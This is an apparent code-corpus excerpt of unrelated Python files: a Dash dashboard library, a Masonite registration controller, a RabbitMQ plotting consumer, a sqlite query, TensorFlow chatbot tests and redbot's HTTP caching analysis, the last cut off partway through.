        # mask_gen.mask_gen(final_annotations, reult_folder)
        # NOTE(review): lesion_count.__init__ as written takes no arguments,
        # so this 3-argument call raises TypeError -- verify the class.
        lesion_stat = lesion_count(xml_file, level, dims)
        annotations = lesion_stat.convert_xml_df()
        final_annotations, lesion_names = lesion_stat.points_collection(annotations)
        slide_lesions = lesion_stat.gen_lesion_table(final_annotations, lesion_names)
        # NOTE(review): slide_lesions is a per-slide list of 3-field rows and
        # slide_name is never attached, so the 4-column DataFrame below will
        # not line up with col_names -- confirm intended output shape.
        lesion_total.append(slide_lesions)
    df_lesion_stat = pd.DataFrame(lesion_total, columns=col_names)
    # NOTE(review): result_folder is a directory; to_csv expects a file path.
    df_lesion_stat.to_csv(result_folder)
|
StarcoderdataPython
|
12801785
|
import os
import shutil
from pathlib import Path
import dash
from dash import html
from dash import dcc
class DashboardObject:
    """Base class for items rendered on the dashboard."""

    def __init__(self, title, description="", dependencies=None, meta=None):
        """
        :param title: heading shown above the object.
        :param description: Markdown body text.
        :param dependencies: optional list of file paths copied on build().
        :param meta: optional dict; meta["env"]["uname"] is shown when given.
        """
        self.title = title
        self.description = description
        # BUG FIX: a fresh list per instance. The previous `dependencies=[]`
        # default was one shared list mutated across all instances.
        self.dependencies = list(dependencies) if dependencies is not None else []
        self.meta = meta

    def build(self, path):
        """Copy every dependency file into *path*."""
        for dep in self.dependencies:
            shutil.copyfile(dep, path.joinpath(dep.name))

    def render(self, dashboard):
        """Return the Dash component tree for this object."""
        children = [
            html.H2(self.title),
            dcc.Markdown(self.description),
        ]
        # BUG FIX: meta defaults to None, so the previous unconditional
        # self.meta["env"]["uname"] raised TypeError for meta-less objects.
        if self.meta is not None:
            children.append(html.Pre(self.meta["env"]["uname"]))
        children.append(self._render(dashboard))
        return html.Div(children=children, className="dashboard-object")

    def _render(self, dashboard):
        """Subclass hook producing the object-specific component."""
        pass
class Graph(DashboardObject):
    """Dashboard object wrapping a Plotly figure (forced to the dark theme)."""
    def __init__(self, figure, title, description = "", meta = None):
        super().__init__(title, description, meta=meta)
        # Mutates the caller's figure in place to match the dashboard theme.
        figure.update_layout(template="plotly_dark")
        self._figure = figure
    def _render(self, dashboard):
        return dcc.Graph(figure=self._figure)
class Component(DashboardObject):
    """Dashboard object wrapping an arbitrary pre-built Dash component."""

    def __init__(self, component, title, description="", dependencies=None):
        # BUG FIX: `dependencies=[]` was a shared mutable default; pass a
        # fresh list when the caller supplies none.
        super().__init__(title, description,
                         dependencies if dependencies is not None else [])
        self._component = component

    def _render(self, dashboard):
        return self._component
class Image(DashboardObject):
    """Dashboard object displaying an image asset staged by build()."""
    def __init__(self, path, title, description = ""):
        super().__init__(title, description)
        self.path = Path(path)
        # The image file itself must be copied into the asset folder.
        self.dependencies.append(self.path)
    def _render(self, dashboard):
        return html.Img(src=dashboard.asset(self.path.name))
class Dashboard:
    """Collects DashboardObjects, stages their assets, and serves a Dash app.

    Requires the OVE_PROJECT_DIR environment variable to locate the asset dir.
    """

    def __init__(self, title):
        self.title = title
        project_dir = Path(os.environ["OVE_PROJECT_DIR"])
        self.asset_dir = project_dir.joinpath("dashboard/assets")
        self.figure_dir = self.asset_dir.joinpath("figures")
        self._built = False
        self._objects = []
        self._app = dash.Dash(__name__, assets_folder=self.asset_dir.absolute())

    def add(self, obj):
        """Register *obj*; returns self so calls can be chained."""
        self._objects.append(obj)
        return self

    def build(self):
        """Create the figure directory and let each object stage its files."""
        self.figure_dir.mkdir(parents=True, exist_ok=True)
        for item in self._objects:
            item.build(self.figure_dir)
        self._built = True
        return self

    def render(self):
        """Render every registered object into one <main> element."""
        return html.Main([item.render(self) for item in self._objects])

    def serve(self):
        """Start the Dash dev server; build() must have been called first."""
        assert self._built
        self._app.layout = html.Div(children=[
            html.H1(["WARA-SW TEP Dashboard: ", html.B(self.title)]),
            self.render(),
        ])
        self._app.run_server(debug=True)

    def asset(self, path):
        """Return the served URL for a staged figure file."""
        return self._app.get_asset_url(str(Path("figures").joinpath(path)))
|
StarcoderdataPython
|
1846763
|
<reponame>nilsreichert/core
"""The RegisterController Module."""
from config import auth
from masonite.auth import Auth
from masonite.helpers import password as bcrypt_password
from masonite.request import Request
from masonite.view import View
from masonite.auth import MustVerifyEmail
from masonite.managers import MailManager
class RegisterController:
    """The RegisterController class."""

    def __init__(self):
        """The RegisterController Constructor."""
        pass

    def show(self, request: Request, view: View):
        """Show the registration page.

        Arguments:
            Request {masonite.request.request} -- The Masonite request class.

        Returns:
            masonite.view.View -- The Masonite View class.
        """
        return view.render('auth/register', {'app': request.app().make('Application'), 'Auth': Auth(request)})

    def store(self, request: Request, mail_manager: MailManager):
        """Register the user with the database.

        Arguments:
            request {masonite.request.Request} -- The Masonite request class.

        Returns:
            masonite.request.Request -- The Masonite request class.
        """
        user = auth.AUTH['model'].create(
            name=request.input('name'),
            # BUG FIX: this line contained an unresolved "<PASSWORD>"
            # placeholder (a SyntaxError). Hash the plaintext password with
            # the imported masonite.helpers.password helper before storing.
            password=bcrypt_password(request.input('password')),
            email=request.input('email'),
        )
        if isinstance(user, MustVerifyEmail):
            user.verify_email(mail_manager, request)
        # Login the user
        if Auth(request).login(request.input(auth.AUTH['model'].__auth__), request.input('password')):
            # Redirect to the homepage
            return request.redirect('/home')
        # Login failed. Redirect to the register page.
        return request.redirect('/register')
|
StarcoderdataPython
|
8164010
|
<gh_stars>0
#!/usr/bin/env python
# Title: UAV client
# Description: Randomly generates peoples poses and sends them to the RabbitMQ server
# Engineer: <NAME>
# Email: <EMAIL>
# Lab: Autonomous Controls Lab, The University of Texas at San Antonio
######### Libraries ###################
import numpy as np
import random
import pika
import time
import matplotlib.pyplot as plt
import yaml
import json
### Read config parameters for RabbitMQ
with open('config.yaml') as f:
    config = yaml.safe_load(f)
hostname = config['hostname']
username = config['username']
password = config['password']
port = config['port']
credentials = pika.PlainCredentials(username, password)
connection = None
# Matplotlib color codes cycled per boat id when plotting.
colors = ['b','g','y','k','c','r']
# Mutable module-level state updated by callback().
auction_count = 0
curr_num_auction = 0
boat_ids = []
curr_time = None
# Receive messages from UAVs and publish to Clustering
# Receive messages from UAVs and publish to Clustering
def callback(ch, method, properties, body):
    """Pika consumer callback: plot each boat's auction position as it arrives.

    NOTE(review): `auction_count` and `curr_num_auction` are declared global
    but never used here -- confirm whether they are vestigial.
    """
    global auction_count, curr_num_auction, boat_ids, curr_time
    auction_info = json.loads(body.decode('utf-8'))
    # First sighting of a boat id assigns it the next color slot.
    if auction_info['boat_id'] not in boat_ids:
        boat_ids.append(auction_info['boat_id'])
    fig = plt.gcf()
    ax = fig.gca()
    plt.scatter(float(auction_info['x_position']),float(auction_info['y_position']),c=colors[boat_ids.index(auction_info['boat_id'])%len(colors)],s=5)
    # Circle of radius 20 drawn around the boat position, same color.
    circle1=plt.Circle((float(auction_info['x_position']),float(auction_info['y_position'])),color=colors[boat_ids.index(auction_info['boat_id'])%len(colors)], radius=20,fill=False)
    plt.ylim([-300,300])
    plt.xlim([-300,300])
    ax.add_artist(circle1)
    print(curr_time, auction_info['time_stamp'])
    # Redraw and clear only when a new timestamp arrives, so all boats from
    # the same time step are shown together.
    if curr_time != auction_info['time_stamp']:
        curr_time = auction_info['time_stamp']
        plt.draw()
        plt.pause(0.1)
        fig.clear()
if __name__ == '__main__':
    # Establish incoming connection from Speed Clusters
    connection_in = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, credentials=credentials, port=port))
    channel_in = connection_in.channel()
    channel_in.exchange_declare(exchange='auctioning_info', exchange_type='direct')
    # NOTE(review): keyword-only queue_declare(exclusive=True) and the
    # basic_consume(callback, queue=...) argument order below follow the
    # pika 0.x API; pika 1.x changed both signatures -- confirm the pinned
    # pika version.
    result_in = channel_in.queue_declare(exclusive=True)
    queue_in_name = result_in.method.queue
    channel_in.queue_bind(exchange='auctioning_info',queue=queue_in_name,routing_key='key_auctioning_info')
    # Indicate queue readiness
    print(' [*] Waiting for messages. To exit, press CTRL+C')
    # Consumption configuration
    channel_in.basic_consume(callback,queue=queue_in_name,no_ack=False)
    # Begin consuming from UAVs
    plt.draw()
    plt.pause(0.01)
    channel_in.start_consuming()
|
StarcoderdataPython
|
60253
|
#!/usr/bin/python
import sqlite3
# Id of the car to look up.
uId = 4

con = sqlite3.connect('ydb.db')

# `with con` commits/rolls back the transaction automatically.
with con:
    cur = con.cursor()
    # Parameterized query -- uId is bound, not interpolated into the SQL.
    cur.execute("SELECT name, price FROM cars WHERE Id=:Id", {"Id": uId})
    row = cur.fetchone()
    # BUG FIX: fetchone() returns None when no row matches; the previous
    # unconditional row[0] subscript then raised TypeError.
    if row is None:
        print(f"No car with Id={uId}")
    else:
        print(f"{row[0]}, {row[1]}")
|
StarcoderdataPython
|
3503554
|
<filename>tests/test_dynamic_models.py
"""Trial runs on DynamicBot with the TestData Dataset."""
import time
import logging
import unittest
import numpy as np
import tensorflow as tf
import pydoc
from pydoc import locate
import data
import chatbot
from utils import io_utils, bot_freezer
from tests.utils import *
class TestDynamicModels(unittest.TestCase):
def setUp(self):
tf.logging.set_verbosity('ERROR')
def test_create_bot(self):
"""Ensure bot constructor is error-free."""
logging.info("Creating bot . . . ")
bot = create_bot()
self.assertIsInstance(bot, chatbot.DynamicBot)
def test_save_bot(self):
"""Ensure we can save to bot ckpt dir."""
bot = create_bot()
self.assertIsInstance(bot, chatbot.DynamicBot)
def test_save_bot(self):
"""Ensure teardown operations are working."""
bot = create_bot()
self.assertIsInstance(bot, chatbot.DynamicBot)
logging.info("Closing bot . . . ")
bot.close()
def test_train(self):
"""Simulate a brief training session."""
flags = TEST_FLAGS
flags = flags._replace(model_params=dict(
**flags.model_params,
reset_model=True,
steps_per_ckpt=10))
bot = create_bot(flags)
self._quick_train(bot)
def test_base_methods(self):
"""Call each method in chatbot._models.Model, checking for errors."""
bot = create_bot()
logging.info('Calling bot.save() . . . ')
bot.save()
logging.info('Calling bot.freeze() . . . ')
bot.freeze()
logging.info('Calling bot.close() . . . ')
bot.close()
def test_manual_freeze(self):
"""Make sure we can freeze the bot, unfreeze, and still chat."""
# ================================================
# 1. Create & train bot.
# ================================================
flags = TEST_FLAGS
flags = flags._replace(model_params=dict(
ckpt_dir=os.path.join(TEST_DIR, 'out'),
reset_model=True,
steps_per_ckpt=20,
max_steps=40))
bot = create_bot(flags)
self.assertEqual(bot.reset_model, True)
# Simulate small train sesh on bot.
bot.train()
# ================================================
# 2. Recreate a chattable bot.
# ================================================
# Recreate bot from scratch with decode set to true.
logging.info("Resetting default graph . . . ")
tf.reset_default_graph()
flags = flags._replace(model_params={
**flags.model_params,
'reset_model': False,
'decode': True,
'max_steps': 100,
'steps_per_ckpt': 50})
self.assertTrue(flags.model_params.get('decode'))
bot = create_bot(flags)
self.assertTrue(bot.is_chatting)
self.assertTrue(bot.decode)
print("Testing quick chat sesh . . . ")
config = io_utils.parse_config(flags=flags)
dataset_class = pydoc.locate(config['dataset']) \
or getattr(data, config['dataset'])
dataset = dataset_class(config['dataset_params'])
test_input = "How's it going?"
encoder_inputs = io_utils.sentence_to_token_ids(
tf.compat.as_bytes(test_input),
dataset.word_to_idx)
encoder_inputs = np.array([encoder_inputs[::-1]])
bot.pipeline._feed_dict = {
bot.pipeline.user_input: encoder_inputs}
# Get output sentence from the chatbot.
_, _, response = bot.step(forward_only=True)
print("Robot:", dataset.as_words(response[0][:-1]))
# ================================================
# 3. Freeze the chattable bot.
# ================================================
logging.info("Calling bot.freeze() . . . ")
bot.freeze()
# ================================================
# 4. Try to unfreeze and use it.
# ================================================
logging.info("Resetting default graph . . . ")
tf.reset_default_graph()
logging.info("Importing frozen graph into default . . . ")
frozen_graph = bot_freezer.load_graph(bot.ckpt_dir)
logging.info("Extracting input/output tensors.")
tensors, frozen_graph = bot_freezer.unfreeze_bot(bot.ckpt_dir)
self.assertIsNotNone(tensors['inputs'])
self.assertIsNotNone(tensors['outputs'])
with tf.Session(graph=frozen_graph) as sess:
raw_input = "How's it going?"
encoder_inputs = io_utils.sentence_to_token_ids(
tf.compat.as_bytes(raw_input),
dataset.word_to_idx)
encoder_inputs = np.array([encoder_inputs[::-1]])
feed_dict = {tensors['inputs'].name: encoder_inputs}
response = sess.run(tensors['outputs'], feed_dict=feed_dict)
logging.info('Reponse: %s', response)
def test_memorize(self):
    """Overfit a bot on the small bundled test data, then check recall.

    Trains for 300 steps on TEST_DATA_DIR, recreates the bot in decode
    mode (training closes its session), and prints, for every training
    pair, whether the bot reproduces the exact training response.
    """
    flags = TEST_FLAGS
    # Small model deliberately sized to memorize the tiny dataset quickly.
    flags = flags._replace(model_params=dict(
        ckpt_dir='out/test_data',
        reset_model=True,
        steps_per_ckpt=300,
        state_size=128,
        embed_size=32,
        max_steps=300))
    flags = flags._replace(dataset_params=dict(
        max_seq_len=20,
        data_dir=TEST_DATA_DIR))
    print('TEST_FLAGS', flags.dataset)
    bot, dataset = create_bot(flags=flags, return_dataset=True)
    bot.train()
    # Recreate bot (its session is automatically closed after training).
    # reset_model=False reloads the checkpoint; decode=True enables chat mode.
    flags = flags._replace(model_params={
        **flags.model_params,
        'reset_model': False,
        'decode': True})
    bot, dataset = create_bot(flags, return_dataset=True)
    for inp_sent, resp_sent in dataset.pairs_generator():
        print('\nHuman:', inp_sent)
        response = bot.respond(inp_sent)
        if response == resp_sent:
            print('Robot: %s\nCorrect!' % response)
        else:
            print('Robot: %s\nExpected: %s' % (
                response, resp_sent))
def _quick_train(self, bot, num_iter=10):
    """Run a short manual training loop on the test data and checkpoint."""
    coordinator = tf.train.Coordinator()
    runners = tf.train.start_queue_runners(sess=bot.sess, coord=coordinator)
    # Take `num_iter` plain steps, then one extra step whose summaries
    # are captured so they can be attached to the saved checkpoint.
    step = 0
    while step < num_iter:
        bot.step()
        step += 1
    summaries, loss, _ = bot.step()
    bot.save(summaries=summaries)
    coordinator.request_stop()
    coordinator.join(runners)
|
StarcoderdataPython
|
8054022
|
#!/usr/bin/env python
"""
Cacheability checking function.
"""
from redbot.formatter import relative_time, f_num
from redbot.message import HttpRequest, HttpResponse
from redbot.speak import Note, categories, levels
### configuration
# Request methods whose responses caches are allowed to store.
cacheable_methods = ['GET']
# Status codes for which caches may compute a heuristic freshness lifetime.
heuristic_cacheable_status = ['200', '203', '206', '300', '301', '410']
# Maximum tolerated difference between server Date and local clock.
max_clock_skew = 5  # seconds
def checkCaching(response: HttpResponse, request: HttpRequest=None) -> None:
    """Examine HTTP caching characteristics.

    Inspects caching-related headers and attaches Notes describing
    storability, freshness, validation and clock behaviour.  Side effects:
    sets response.store_shared / response.store_private, response.age and
    response.freshness_lifetime.  Returns early ("bails") when a header
    makes further analysis pointless (uncacheable method, no-store,
    no-cache, Vary: *).
    """
    # get header values
    lm_hdr = response.parsed_headers.get('last-modified', None)
    date_hdr = response.parsed_headers.get('date', None)
    expires_hdr = response.parsed_headers.get('expires', None)
    etag_hdr = response.parsed_headers.get('etag', None)
    age_hdr = response.parsed_headers.get('age', None)
    cc_set = response.parsed_headers.get('cache-control', [])
    cc_list = [k for (k, v) in cc_set]  # directive names; duplicates preserved
    cc_dict = dict(cc_set)  # collapses duplicate directives (last one wins)
    cc_keys = list(cc_dict.keys())

    # Last-Modified
    if lm_hdr:
        # Prefer the server's Date; fall back to when we started the exchange.
        serv_date = date_hdr or response.start_time
        if lm_hdr > serv_date:
            response.add_note('header-last-modified', LM_FUTURE)
        else:
            response.add_note('header-last-modified', LM_PRESENT,
                              last_modified_string=relative_time(lm_hdr, serv_date))

    # known Cache-Control directives that don't allow duplicates
    known_cc = ["max-age", "no-store", "s-maxage", "public",
                "private", "pre-check", "post-check",
                "stale-while-revalidate", "stale-if-error"]

    # check for mis-capitalised directives /
    # assure there aren't any dup directives with different values
    for cc in cc_keys:
        if cc.lower() in known_cc and cc != cc.lower():
            response.add_note('header-cache-control', CC_MISCAP,
                              cc_lower=cc.lower(), cc=cc)
        if cc in known_cc and cc_list.count(cc) > 1:
            response.add_note('header-cache-control', CC_DUP, cc=cc)

    # Who can store this?
    if request and request.method not in cacheable_methods:
        response.store_shared = response.store_private = False
        request.add_note('method', METHOD_UNCACHEABLE, method=request.method)
        return  # bail; nothing else to see here
    elif 'no-store' in cc_keys:
        response.store_shared = response.store_private = False
        response.add_note('header-cache-control', NO_STORE)
        return  # bail; nothing else to see here
    elif 'private' in cc_keys:
        response.store_shared = False
        response.store_private = True
        response.add_note('header-cache-control', PRIVATE_CC)
    elif request and 'authorization' in [k.lower() for k, v in request.headers] \
      and 'public' not in cc_keys:
        # Authenticated request without `public`: shared caches may not store.
        response.store_shared = False
        response.store_private = True
        response.add_note('header-cache-control', PRIVATE_AUTH)
    else:
        response.store_shared = response.store_private = True
        response.add_note('header-cache-control', STOREABLE)

    # no-cache?
    if 'no-cache' in cc_keys:
        # no-cache without any validator effectively prevents reuse entirely.
        if lm_hdr is None and etag_hdr is None:
            response.add_note('header-cache-control', NO_CACHE_NO_VALIDATOR)
        else:
            response.add_note('header-cache-control', NO_CACHE)
        return

    # pre-check / post-check (Internet Explorer cache extensions)
    if 'pre-check' in cc_keys or 'post-check' in cc_keys:
        if 'pre-check' not in cc_keys or 'post-check' not in cc_keys:
            response.add_note('header-cache-control', CHECK_SINGLE)
        else:
            pre_check = post_check = None
            try:
                pre_check = int(cc_dict['pre-check'])
                post_check = int(cc_dict['post-check'])
            except ValueError:
                response.add_note('header-cache-control', CHECK_NOT_INTEGER)
            if pre_check is not None and post_check is not None:
                if pre_check == 0 and post_check == 0:
                    response.add_note('header-cache-control', CHECK_ALL_ZERO)
                elif post_check > pre_check:
                    response.add_note('header-cache-control', CHECK_POST_BIGGER)
                    post_check = pre_check  # IE clamps post-check to pre-check
                elif post_check == 0:
                    response.add_note('header-cache-control', CHECK_POST_ZERO)
                else:
                    response.add_note('header-cache-control', CHECK_POST_PRE,
                                      pre_check=pre_check, post_check=post_check)

    # vary?
    vary = response.parsed_headers.get('vary', set())
    if "*" in vary:
        response.add_note('header-vary', VARY_ASTERISK)
        return  # bail; nothing else to see here
    elif len(vary) > 3:
        response.add_note('header-vary', VARY_COMPLEX, vary_count=f_num(len(vary)))
    else:
        if "user-agent" in vary:
            response.add_note('header-vary', VARY_USER_AGENT)
        if "host" in vary:
            response.add_note('header-vary', VARY_HOST)

    # calculate age
    response.age = age_hdr or 0
    age_str = relative_time(response.age, 0, 0)
    if date_hdr and date_hdr > 0:
        # Apparent age per the local clock, floored at zero.
        apparent_age = max(0, int(response.start_time - date_hdr))
    else:
        apparent_age = 0
    current_age = max(apparent_age, response.age)
    current_age_str = relative_time(current_age, 0, 0)
    if response.age >= 1:
        response.add_note('header-age header-date', CURRENT_AGE, age=age_str)

    # Check for clock skew and dateless origin server.
    if not date_hdr:
        response.add_note('', DATE_CLOCKLESS)
        if expires_hdr or lm_hdr:
            response.add_note('header-expires header-last-modified', DATE_CLOCKLESS_BAD_HDR)
    else:
        skew = date_hdr - response.start_time + (response.age)
        if response.age > max_clock_skew and (current_age - skew) < max_clock_skew:
            # Date is newer than Age implies: an intermediary likely re-dated it.
            response.add_note('header-date header-age', AGE_PENALTY)
        elif abs(skew) > max_clock_skew:
            response.add_note('header-date', DATE_INCORRECT,
                              clock_skew_string=relative_time(skew, 0, 2))
        else:
            response.add_note('header-date', DATE_CORRECT)

    # calculate freshness
    freshness_lifetime = 0
    has_explicit_freshness = False
    has_cc_freshness = False
    freshness_hdrs = ['header-date']
    # Precedence: s-maxage over max-age over Expires.
    if 's-maxage' in cc_keys:
        freshness_lifetime = cc_dict['s-maxage']
        freshness_hdrs.append('header-cache-control')
        has_explicit_freshness = True
        has_cc_freshness = True
    elif 'max-age' in cc_keys:
        freshness_lifetime = cc_dict['max-age']
        freshness_hdrs.append('header-cache-control')
        has_explicit_freshness = True
        has_cc_freshness = True
    elif 'expires' in response.parsed_headers:
        # An invalid Expires header means it's automatically stale
        has_explicit_freshness = True
        freshness_hdrs.append('header-expires')
        freshness_lifetime = (expires_hdr or 0) - (date_hdr or int(response.start_time))

    freshness_left = freshness_lifetime - current_age
    freshness_left_str = relative_time(abs(int(freshness_left)), 0, 0)
    freshness_lifetime_str = relative_time(int(freshness_lifetime), 0, 0)

    response.freshness_lifetime = freshness_lifetime
    fresh = freshness_left > 0

    if has_explicit_freshness:
        if fresh:
            response.add_note(" ".join(freshness_hdrs), FRESHNESS_FRESH,
                              freshness_lifetime=freshness_lifetime_str,
                              freshness_left=freshness_left_str,
                              current_age=current_age_str)
        elif has_cc_freshness and response.age > freshness_lifetime:
            response.add_note(" ".join(freshness_hdrs), FRESHNESS_STALE_CACHE,
                              freshness_lifetime=freshness_lifetime_str,
                              freshness_left=freshness_left_str,
                              current_age=current_age_str)
        else:
            response.add_note(" ".join(freshness_hdrs), FRESHNESS_STALE_ALREADY,
                              freshness_lifetime=freshness_lifetime_str,
                              freshness_left=freshness_left_str,
                              current_age=current_age_str)
    # can heuristic freshness be used?
    elif response.status_code in heuristic_cacheable_status:
        response.add_note('header-last-modified', FRESHNESS_HEURISTIC)
    else:
        response.add_note('', FRESHNESS_NONE)

    # can stale responses be served?
    if 'must-revalidate' in cc_keys:
        if fresh:
            response.add_note('header-cache-control', FRESH_MUST_REVALIDATE)
        elif has_explicit_freshness:
            response.add_note('header-cache-control', STALE_MUST_REVALIDATE)
    elif 'proxy-revalidate' in cc_keys or 's-maxage' in cc_keys:
        if fresh:
            response.add_note('header-cache-control', FRESH_PROXY_REVALIDATE)
        elif has_explicit_freshness:
            response.add_note('header-cache-control', STALE_PROXY_REVALIDATE)
    else:
        if fresh:
            response.add_note('header-cache-control', FRESH_SERVABLE)
        elif has_explicit_freshness:
            response.add_note('header-cache-control', STALE_SERVABLE)

    # public?
    if 'public' in cc_keys:  # TODO: check for authentication in request
        response.add_note('header-cache-control', PUBLIC)
class LM_FUTURE(Note):
    # Emitted when the Last-Modified timestamp is later than the server's
    # own date (see checkCaching's Last-Modified handling).
    category = categories.CACHING
    level = levels.BAD
    summary = "The Last-Modified time is in the future."
    text = """\
The `Last-Modified` header indicates the last point in time that the resource has changed.
%(response)s's `Last-Modified` time is in the future, which doesn't have any defined meaning in
HTTP."""
class LM_PRESENT(Note):
category = categories.CACHING
level = levels.INFO
summary = "The resource last changed %(last_modified_string)s."
text = """\
The `Last-Modified` header indicates the last point in time that the resource has changed. It is
used in HTTP for validating cached responses, and for calculating heuristic freshness in caches.
This resource last changed %(last_modified_string)s."""
class METHOD_UNCACHEABLE(Note):
category = categories.CACHING
level = levels.INFO
summary = "Responses to the %(method)s method can't be stored by caches."
text = """\
"""
class CC_MISCAP(Note):
category = categories.CACHING
level = levels.WARN
summary = "The %(cc)s Cache-Control directive appears to have incorrect \
capitalisation."
text = """\
Cache-Control directive names are case-sensitive, and will not be recognised by most
implementations if the capitalisation is wrong.
Did you mean to use %(cc_lower)s instead of %(cc)s?"""
class CC_DUP(Note):
category = categories.CACHING
level = levels.WARN
summary = "The %(cc)s Cache-Control directive appears more than once."
text = """\
The %(cc)s Cache-Control directive is only defined to appear once; it is used more than once here,
so implementations may use different instances (e.g., the first, or the last), making their
behaviour unpredictable."""
class NO_STORE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s can't be stored by a cache."
text = """\
The `Cache-Control: no-store` directive indicates that this response can't be stored by a cache."""
class PRIVATE_CC(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s only allows a private cache to store it."
text = """\
The `Cache-Control: private` directive indicates that the response can only be stored by caches
that are specific to a single user; for example, a browser cache. Shared caches, such as those in
proxies, cannot store it."""
class PRIVATE_AUTH(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s only allows a private cache to store it."
text = """\
Because the request was authenticated and this response doesn't contain a `Cache-Control: public`
directive, this response can only be stored by caches that are specific to a single user; for
example, a browser cache. Shared caches, such as those in proxies, cannot store it."""
class STOREABLE(Note):
category = categories.CACHING
level = levels.INFO
summary = """\
%(response)s allows all caches to store it."""
text = """\
A cache can store this response; it may or may not be able to use it to satisfy a particular
request."""
class NO_CACHE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served from cache without validation."
text = """\
The `Cache-Control: no-cache` directive means that while caches **can** store this
response, they cannot use it to satisfy a request unless it has been validated (either with an
`If-None-Match` or `If-Modified-Since` conditional) for that request."""
class NO_CACHE_NO_VALIDATOR(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served from cache without validation."
text = """\
The `Cache-Control: no-cache` directive means that while caches **can** store this response, they
cannot use it to satisfy a request unless it has been validated (either with an `If-None-Match` or
`If-Modified-Since` conditional) for that request.
%(response)s doesn't have a `Last-Modified` or `ETag` header, so it effectively can't be used by a
cache."""
class VARY_ASTERISK(Note):
category = categories.CACHING
level = levels.WARN
summary = "Vary: * effectively makes this response uncacheable."
text = """\
`Vary *` indicates that responses for this resource vary by some aspect that can't (or won't) be
described by the server. This makes this response effectively uncacheable."""
class VARY_USER_AGENT(Note):
category = categories.CACHING
level = levels.INFO
summary = "Vary: User-Agent can cause cache inefficiency."
text = """\
Sending `Vary: User-Agent` requires caches to store a separate copy of the response for every
`User-Agent` request header they see.
Since there are so many different `User-Agent`s, this can "bloat" caches with many copies of the
same thing, or cause them to give up on storing these responses at all.
Consider having different URIs for the various versions of your content instead; this will give
finer control over caching without sacrificing efficiency."""
class VARY_HOST(Note):
category = categories.CACHING
level = levels.WARN
summary = "Vary: Host is not necessary."
text = """\
Some servers (e.g., [Apache](http://httpd.apache.org/) with
[mod_rewrite](http://httpd.apache.org/docs/2.4/mod/mod_rewrite.html)) will send `Host` in the
`Vary` header, in the belief that since it affects how the server selects what to send back, this
is necessary.
This is not the case; HTTP specifies that the URI is the basis of the cache key, and the URI
incorporates the `Host` header.
The presence of `Vary: Host` may make some caches not store an otherwise cacheable response (since
some cache implementations will not store anything that has a `Vary` header)."""
class VARY_COMPLEX(Note):
category = categories.CACHING
level = levels.WARN
summary = "This resource varies in %(vary_count)s ways."
text = """\
The `Vary` mechanism allows a resource to describe the dimensions that its responses vary, or
change, over; each listed header is another dimension.
Varying by too many dimensions makes using this information impractical."""
class PUBLIC(Note):
category = categories.CACHING
level = levels.WARN
summary = "Cache-Control: public is rarely necessary."
text = """\
The `Cache-Control: public` directive makes a response cacheable even when the request had an
`Authorization` header (i.e., HTTP authentication was in use).
Therefore, HTTP-authenticated (NOT cookie-authenticated) resources _may_ have use for `public` to
improve cacheability, if used judiciously.
However, other responses **do not need to contain `public`**; it does not make the
response "more cacheable", and only makes the response headers larger."""
class CURRENT_AGE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s has been cached for %(age)s."
text = """\
The `Age` header indicates the age of the response; i.e., how long it has been cached since it was
generated. HTTP takes this as well as any apparent clock skew into account in computing how old the
response already is."""
class FRESHNESS_FRESH(Note):
category = categories.CACHING
level = levels.GOOD
summary = "%(response)s is fresh until %(freshness_left)s from now."
text = """\
A response can be considered fresh when its age (here, %(current_age)s) is less than its freshness
lifetime (in this case, %(freshness_lifetime)s)."""
class FRESHNESS_STALE_CACHE(Note):
category = categories.CACHING
level = levels.WARN
summary = "%(response)s has been served stale by a cache."
text = """\
An HTTP response is stale when its age (here, %(current_age)s) is equal to or exceeds its freshness
lifetime (in this case, %(freshness_lifetime)s).
HTTP allows caches to use stale responses to satisfy requests only under exceptional circumstances;
e.g., when they lose contact with the origin server. Either that has happened here, or the cache
has ignored the response's freshness directives."""
class FRESHNESS_STALE_ALREADY(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s is already stale."
text = """\
A cache considers a HTTP response stale when its age (here, %(current_age)s) is equal to or exceeds
its freshness lifetime (in this case, %(freshness_lifetime)s).
HTTP allows caches to use stale responses to satisfy requests only under exceptional circumstances;
e.g., when they lose contact with the origin server."""
class FRESHNESS_HEURISTIC(Note):
category = categories.CACHING
level = levels.WARN
summary = "%(response)s allows a cache to assign its own freshness lifetime."
text = """\
When responses with certain status codes don't have explicit freshness information (like a `
Cache-Control: max-age` directive, or `Expires` header), caches are allowed to estimate how fresh
it is using a heuristic.
Usually, but not always, this is done using the `Last-Modified` header. For example, if your
response was last modified a week ago, a cache might decide to consider the response fresh for a
day.
Consider adding a `Cache-Control` header; otherwise, it may be cached for longer or shorter than
you'd like."""
class FRESHNESS_NONE(Note):
    # Emitted when a response has no explicit freshness information and its
    # status code does not permit heuristic freshness either.
    # Fix: corrected typos in the user-facing text ("cirucumstances" ->
    # "circumstances", "such a when" -> "such as when").
    category = categories.CACHING
    level = levels.INFO
    summary = "%(response)s can only be served by a cache under exceptional circumstances."
    text = """\
%(response)s doesn't have explicit freshness information (like a ` Cache-Control: max-age`
directive, or `Expires` header), and this status code doesn't allow caches to calculate their own.
Therefore, while caches may be allowed to store it, they can't use it, except in unusual
circumstances, such as when the origin server can't be contacted.
This behaviour can be prevented by using the `Cache-Control: must-revalidate` response directive.
Note that many caches will not store the response at all, because it is not generally useful to do
so."""
class FRESH_SERVABLE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s may still be served by a cache once it becomes stale."
text = """\
HTTP allows stale responses to be served under some circumstances; for example, if the origin
server can't be contacted, a stale response can be used (even if it doesn't have explicit freshness
information).
This behaviour can be prevented by using the `Cache-Control: must-revalidate` response directive."""
class STALE_SERVABLE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s might be served by a cache, even though it is stale."
text = """\
HTTP allows stale responses to be served under some circumstances; for example, if the origin
server can't be contacted, a stale response can be used (even if it doesn't have explicit freshness
information).
This behaviour can be prevented by using the `Cache-Control: must-revalidate` response directive."""
class FRESH_MUST_REVALIDATE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served by a cache once it becomes stale."
